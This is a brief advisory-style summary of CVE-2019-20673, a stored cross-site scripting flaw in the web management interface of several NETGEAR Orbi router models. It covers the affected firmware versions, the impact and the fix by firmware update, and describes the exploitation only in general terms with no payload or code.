CVE-2019-20673

Vulnerability

CVE-2019-20673 is a stored cross-site scripting (XSS) vulnerability affecting NETGEAR Orbi WiFi system models. The flaw exists in the web-based management interface of RBR20, RBS20, RBK20, RBS40, RBR40, RBK40, RBR50, RBS50, and RBK50 devices. Affected firmware versions are prior to 2.3.5.26 for the RBR20/RBS20/RBK20 models and prior to 2.3.5.30 for the RBR40/RBS40/RBK40/RBR50/RBS50/RBK50 models [1]. The vulnerability is triggered when an attacker injects malicious script code that is stored on the device and later executed when an administrator views the affected page.

Exploitation

An unauthenticated attacker can exploit this vulnerability by sending a specially crafted request containing malicious JavaScript code to an affected NETGEAR device. The attacker does not need prior authentication or network access beyond being able to reach the device's management interface. The injected script is stored on the device and executed in the context of the browser of any authenticated administrator who subsequently loads the vulnerable page [1]. No user interaction beyond normal administrative browsing is required to trigger the stored payload.

Impact

Successful exploitation allows the attacker to execute arbitrary JavaScript within the victim's browser session. This can lead to session hijacking, theft of administrative credentials, defacement, or further actions performed with the privileges of the authenticated administrator [1]. The vulnerability compromises the confidentiality and integrity of the affected device and network.

Mitigation

NETGEAR has released fixed firmware versions: 2.3.5.26 for RBR20/RBS20/RBK20 models and 2.3.5.30 for RBR40/RBS40/RBK40/RBR50/RBS50/RBK50 models. Users should download and install the latest firmware from the NETGEAR Support website as soon as possible [1]. No workarounds are available; updating firmware is the only recommended mitigation.